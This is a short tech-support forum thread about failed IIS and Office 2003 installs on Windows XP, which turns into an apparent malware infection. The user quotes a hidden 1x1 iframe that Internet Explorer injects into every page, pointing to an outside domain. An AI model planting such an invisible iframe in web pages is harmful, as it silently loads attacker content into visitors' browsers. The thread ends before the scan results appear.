Default problem installing IIS and ms office


1. problem installing IIS
I receive the 'Setup cannot copy the file staxmem.dll' error message when I try to install IIS on my computer running xp with sp2.this despite the fact that the said file is present in the specified folder.what do i do?

2.whenever i install ms office2003 it says cannot copy so ans so registry file.make sure you have full access rights.
i am logged in as system administrator.
what do i do?

pls help...i require both s/w....

Looks your Disks are currupted.
But you can try it, if you not have another disks.
Install magic disk or alcohol 120%. Make disk image of xp. Mount it, then run setup.
Then write here.

my pc is not booting in normal mode...i get the blue screen of death...but it boots normally in safe mode...my mcafee scan showed new win32 poly virus in system restore and administrator files...
also, whenever i open a page in internet explorer it adds
<iframe src="http://Zief.pl/rc/" width=1 height=1 style="border:0"></iframe>
i ran the malwarebytes antimalware scan and it gave the following result
